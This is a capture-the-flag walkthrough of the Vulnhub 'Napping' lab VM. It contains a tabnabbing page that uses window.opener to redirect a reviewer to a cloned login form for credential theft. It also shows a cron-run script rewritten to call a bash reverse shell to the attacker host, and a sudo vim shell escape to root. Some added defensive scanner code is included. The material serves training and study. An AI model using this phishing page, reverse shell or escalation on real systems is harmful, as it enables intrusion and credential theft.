Vulnhub lab: NAPPING: 1.0.1
Environment setup
Target machine link
Attacker host IP: 192.168.47.145
Target host IP: 192.168.47.13
Information gathering
Scanning the target host shows that ports 22 and 80 are open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 172.18.53.13
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-09 08:48 EST
Nmap scan report for 172.18.53.1
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
| 256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 172.18.53.1
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
Web vulnerability hunting
Visiting port 80 on the target shows a login/registration page.
SQL injection, "universal password" login-bypass payloads and weak credentials were tried here, without success.
Next, brute-force directories to see whether other paths exist.
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://172.18.53.13/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.18.53.1/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,php,html,js,txt.bak,git,git.bak,txt,php.bak,html.bak,json,zip.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/.html.bak (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/register.php (Status: 200) [Size: 1566]
/index.php (Status: 200) [Size: 1219]
/welcome.php (Status: 302) [Size: 0] [--> index.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/config.php (Status: 200) [Size: 0]
/.html.bak (Status: 403) [Size: 276]
/.php (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
Visiting config.php gives a blank page; guessing that it may expect parameters, ffuf was tried on it, again without success.
So go back to the earlier page, register an account first and then log in.
After logging in, it is a blog-promotion site: you can submit blog links for free promotion, and every link is reviewed by the admin user.
After we submit a link, we can view it by clicking Here.
Searching through walkthroughs (wp) shows that a tabnabbing vulnerability exists here.
Use F12 to change the link behind Here and see whether it redirects. If whatever site you enter is the site it jumps to, a tabnabbing vulnerability exists.
Tabnabbing attack:
An a tag on legitimate site A points to malicious site B; B uses window.opener to modify the original page A, silently replacing the legitimate page A that the user opened with phishing page C.
Two exploitable conditions:
1. An a tag with target=_blank that does not set the rel="noopener/noreferrer" attribute
2. Use of window.open
After clicking, the redirect does indeed happen.
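As a defender-side check for the two conditions just listed (added example, not code from the original writeup or from the Napping VM): a Python scanner that flags target="_blank" anchors lacking rel="noopener"/"noreferrer" and rewrites them; the sample markup and the example.invalid URL are constructed.

```python
import html
import re
from html.parser import HTMLParser
# Added example (not from the original writeup): find <a target="_blank"> links
# that lack rel="noopener"/"noreferrer" (the tabnabbing precondition above) and
# rewrite them so the opened page no longer receives a window.opener reference.

class _AnchorCollector(HTMLParser):
    """Collect the attributes of every <a> tag, in document order."""
    def __init__(self):
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.anchors.append({k: (v or "") for k, v in attrs})

def _anchors(markup):
    p = _AnchorCollector()
    p.feed(markup)
    return p.anchors

def is_unsafe(attrs):
    """True when the link opens a new window but keeps window.opener alive."""
    if attrs.get("target", "").lower() != "_blank":
        return False
    rel = set(attrs.get("rel", "").lower().split())
    return not (rel & {"noopener", "noreferrer"})  # noreferrer implies noopener

def find_unsafe_links(page):
    """Return the hrefs of anchors on `page` that are exposed to tabnabbing."""
    return [a.get("href", "") for a in _anchors(page) if is_unsafe(a)]

_A_TAG = re.compile(r"<a\b([^>]*)>", re.IGNORECASE)

def harden_links(page):
    """Rebuild each unsafe anchor with rel="noopener noreferrer" appended.
    Assumes attribute values contain no literal '>' character."""
    def fix(m):
        parsed = _anchors("<a" + m.group(1) + ">")
        attrs = parsed[0] if parsed else {}
        if not is_unsafe(attrs):
            return m.group(0)  # already safe, or not a new-window link
        attrs["rel"] = " ".join(attrs.get("rel", "").split() + ["noopener", "noreferrer"])
        rendered = " ".join('%s="%s"' % (k, html.escape(v, quote=True)) for k, v in attrs.items())
        return "<a " + rendered + ">"
    return _A_TAG.sub(fix, page)

# Constructed sample modelled on the "Here" link shown after submitting a URL
SAMPLE = '<p>View your submission <a href="http://example.invalid/B.html" target="_blank">Here</a></p>'
```

Run find_unsafe_links over the rendered review page to list offending links, and harden_links over the template output to emit them with the attribute the site is missing.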
Next, we create two pages: a malicious page B and a forged login page C.
Malicious page B.html:
<!DOCTYPE html>
<html>
<body>
<script>
// Only act when this tab was opened by another window and still holds a reference to it
if (window.opener && window.opener !== window) {
  // Replace the opener's document with the forged login page
  window.opener.location.replace('http://172.18.53.145:8888/C.html');
}
</script>
</body>
</html>
Code explanation:
1. The window.opener property is the window object that opened the current window; if the current window was not opened by another window, its value is null.
2. if(window.opener) checks whether window.opener exists; if it does, the current window was opened by another window, i.e. from within an iframe.
3. The opener is the main window, that is, the window that opened the current one.
4. location.replace changes the main window's address to a new one, which amounts to redirecting the main window.
5. Setting the main window's location to 'http://172.18.53.145:8888/login.html' redirects the main window to this new login page.
Forged login page C.html, which simply copies the source of the real login page:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<style>
body{ font: 14px sans-serif; }
.wrapper{ width: 360px; padding: 20px; }
</style>
</head>
<body>
<div class="wrapper">
<h2>Login</h2>
<p>Please fill in your credentials to login.</p>
<form action="/index.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
</form>
</div>
</body>
</html>
On the attacker machine, start an HTTP server with python and listen on local port 8888.
┌──(kali㉿kali)-[~/tools/download]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
Then submit page B as the blog link to be promoted; this effectively embeds the malicious link in the legitimate page. When the admin user clicks the link to review it, the original page is redirected to our forged login page, and when the admin logs in there, the attacker captures the admin's username and password.
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 49584
POST /login.html HTTP/1.1
Host: 172.18.53.145:8888
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
username=daniel&password=C%40ughtm3napping123
This gives us the account daniel with password C@ughtm3napping123. Recalling that the port scan showed port 22 open on the target, use these credentials to log in over SSH.
┌──(kali㉿kali)-[~]
└─$ ssh daniel@172.18.53.13
The authenticity of host '172.18.53.13 (172.18.53.13)' can't be established.
ED25519 key fingerprint is SHA256:81h22zyEZ6ztpKfLu65kzPnsnUUotkuioRYPno8fpN8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.53.13' (ED25519) to the list of known hosts.
daniel@172.18.53.13's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Nov 10 06:49:58 UTC 2023
System load: 0.02
Usage of /: 44.0% of 18.57GB
Memory usage: 10%
Swap usage: 0%
Processes: 149
Users logged in: 0
IPv4 address for enp0s3: 172.18.53.13
IPv6 address for enp0s3: 2001:250:6406:2053:a00:27ff:fe49:ee4d
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$
Privilege escalation
After logging in, gather basic information about the target host.
(1) We have the current user's password, so first check the current user's sudo rights: the user has none.
daniel@napping:~$ sudo -l
[sudo] password for daniel:
Sorry, user daniel may not run sudo on napping.
(2) Check for suspicious users or groups.
Looking at the current user and their groups shows that the current user belongs to a group named administrators.
daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
Check the /etc/passwd file for special users: the adrian and daniel users stand out, as ls /home also shows.
daniel@napping:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
daniel:x:1001:1001::/home/daniel:/bin/bash
(3) Check the kernel version and network configuration.
daniel@napping:~$ uname -a
Linux napping 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
daniel@napping:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff
inet 172.18.53.13/24 brd 172.18.53.255 scope global dynamic enp0s3
valid_lft 4184sec preferred_lft 4184sec
inet6 2001:250:6406:2053:a00:27ff:fe49:ee4d/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 2591998sec preferred_lft 604798sec
inet6 fe80::a00:27ff:fe49:ee4d/64 scope link
valid_lft forever preferred_lft forever
(4) Check whether the web root holds sensitive information such as database credentials.
A database username and password are found in config.php.
daniel@napping:~$ cd /var/www/html/
daniel@napping:/var/www/html$ ls -liah
total 44K
792043 drwxr-xr-x 2 root root 4.0K Oct 12 2021 .
792042 drwxr-xr-x 3 root root 4.0K Oct 11 2021 ..
792826 -rw-r--r-- 1 root root 486 Oct 11 2021 config.php
792827 -rw-r--r-- 1 root root 4.7K Oct 11 2021 index.php
792828 -rw-r--r-- 1 root root 223 Oct 11 2021 logout.php
792830 -rw-r--r-- 1 root root 5.2K Oct 11 2021 register.php
792829 -rw-r--r-- 1 root root 3.9K Oct 11 2021 reset-password.php
794398 -rw-r--r-- 1 root root 6.8K Oct 12 2021 welcome.php
daniel@napping:/var/www/html$ cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
(5) Check the home directories for suspicious files.
daniel@napping:~$ ls /home/
adrian daniel
daniel@napping:~$ ls -liah /home/adrian/
total 32K
791504 drwxr-xr-x 3 adrian adrian 4.0K Nov 9 13:48 .
262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 ..
794373 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .bash_history -> /dev/null
791506 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bash_logout
791507 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bashrc
791524 drwx------ 2 adrian adrian 4.0K Oct 11 2021 .cache
794363 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .mysql_history -> /dev/null
791505 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .profile
794359 -rw-rw-r-- 1 adrian adrian 75 Oct 11 2021 .selected_editor
791526 -rw-r--r-- 1 adrian adrian 0 Oct 11 2021 .sudo_as_admin_successful
792736 -rw------- 1 adrian adrian 0 Oct 30 2021 .viminfo
792740 -rw-rw-r-- 1 adrian administrators 481 Oct 30 2021 query.py
792383 -rw-rw-r-- 1 adrian adrian 5.9K Nov 10 07:08 site_status.txt
794392 -rw------- 1 adrian adrian 22 Oct 12 2021 user.txt
daniel@napping:~$ ls -liah /home/daniel/
total 24K
792831 drwxr-xr-x 3 daniel daniel 4.0K Oct 12 2021 .
262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 ..
794391 lrwxrwxrwx 1 daniel daniel 9 Oct 12 2021 .bash_history -> /dev/null
794358 -rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout
794360 -rw-r--r-- 1 daniel daniel 3.7K Feb 25 2020 .bashrc
794361 drwx------ 2 daniel daniel 4.0K Oct 12 2021 .cache
794351 -rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile
792825 -rw------- 1 daniel daniel 0 Oct 12 2021 .viminfo
There is nothing suspicious in daniel's home directory. In adrian's home directory, query.py is readable and writable by the administrators group, and the currently logged-in user is a member of that group, so this file is a candidate for abuse. First look at its contents.
daniel@napping:~$ cat /home/adrian/query.py
from datetime import datetime
import requests
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
The script first requests the local website; if the request succeeds it appends "Site is Up" and the check time to site_status.txt, otherwise it appends "Check Out Site" and the check time.
Looking at site_status.txt, the file has recorded the site's status every two minutes since the site came up.
daniel@napping:/home/adrian$ cat site_status.txt
Site is Up: 09/11/2023 13:48:03
Site is Up: 09/11/2023 13:50:01
Site is Up: 09/11/2023 13:52:02
Site is Up: 09/11/2023 13:54:01
Site is Up: 09/11/2023 13:56:01
Site is Up: 09/11/2023 13:58:01
Site is Up: 09/11/2023 14:00:02
Site is Up: 09/11/2023 14:02:01
Site is Up: 09/11/2023 14:04:02
Site is Up: 09/11/2023 14:06:02
Site is Up: 09/11/2023 14:08:02
Site is Up: 09/11/2023 14:10:01
Site is Up: 09/11/2023 14:12:01
Site is Up: 09/11/2023 14:14:01
Site is Up: 09/11/2023 14:16:02
Presumably a scheduled task runs this script every two minutes.
Because the current user's group has permission to modify the script, consider modifying it directly to spawn a reverse shell and obtain adrian's privileges.
Create shell.sh in the /tmp directory:
daniel@napping:/tmp$ cat shell.sh
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/172.18.53.145/4444 0>&1'
Modify the query.py file:
daniel@napping:/home/adrian$ cat query.py
from datetime import datetime
import requests
import os
os.system('/usr/bin/bash /tmp/shell.sh')
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
After waiting two minutes, the reverse shell connects.
┌──(kali㉿kali)-[~/tools/download]
└─$ nc -lvp 4444
listening on [any] 4444 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 35184
bash: cannot set terminal process group (3941): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$
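The condition that made this step possible, a script executed unattended as one account but writable by other accounts, can be audited for as follows (added example, not from the original writeup; the audit function, the temporary query.py copy and its modes are constructed, mirroring the rw-rw-r-- mode seen on adrian's query.py):

```python
import os
import stat
import tempfile

# Added example (not from the original writeup): audit a script that a scheduled
# task runs as one account for the weakness exploited above, namely that other
# accounts can rewrite it because the file (or its directory) is group/world-writable.

def audit_scheduled_script(path, runner_uid):
    """Return findings for `path` when a cron job executes it as `runner_uid`.

    Unattended execution is only safe if nobody but the owner (ideally root)
    can modify the file; every condition listed here lets someone else do so.
    """
    st = os.lstat(path)
    findings = []
    if stat.S_ISLNK(st.st_mode):
        return ["symlink: audit the resolved target instead"]
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWGRP:
        findings.append("group-writable (mode %04o): every member of gid %d can edit it" % (mode, st.st_gid))
    if mode & stat.S_IWOTH:
        findings.append("world-writable (mode %04o)" % mode)
    if st.st_uid not in (0, runner_uid):
        findings.append("owned by uid %d, neither root nor the running uid %d" % (st.st_uid, runner_uid))
    # write access to the directory allows replacing the file outright
    parent = os.path.dirname(os.path.abspath(path))
    pmode = stat.S_IMODE(os.stat(parent).st_mode)
    if pmode & (stat.S_IWGRP | stat.S_IWOTH) and not pmode & stat.S_ISVTX:
        findings.append("directory %s is group/world-writable without the sticky bit" % parent)
    return findings

def demo():
    """Constructed sample: the same file with query.py's 0664 mode, then hardened to 0644."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "query.py")
        with open(path, "w") as f:
            f.write("import requests\n")
        os.chmod(path, 0o664)   # rw-rw-r--, as on the target's query.py
        loose = audit_scheduled_script(path, os.getuid())
        os.chmod(path, 0o644)   # rw-r--r--, only the owner can edit
        tight = audit_scheduled_script(path, os.getuid())
    return loose, tight

if __name__ == "__main__":
    for label, result in zip(("0664", "0644"), demo()):
        print(label, result or "no findings")
```

Run audit_scheduled_script over every script referenced from crontabs and /etc/cron.* with the uid the job runs as; a clean result is an empty list.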
Checking the current user's sudo rights shows that this user can run vim without a password.
adrian@napping:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
So, escalate privileges using vim:
sudo vim -c ':!/bin/sh'
Privilege escalation succeeded:
:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)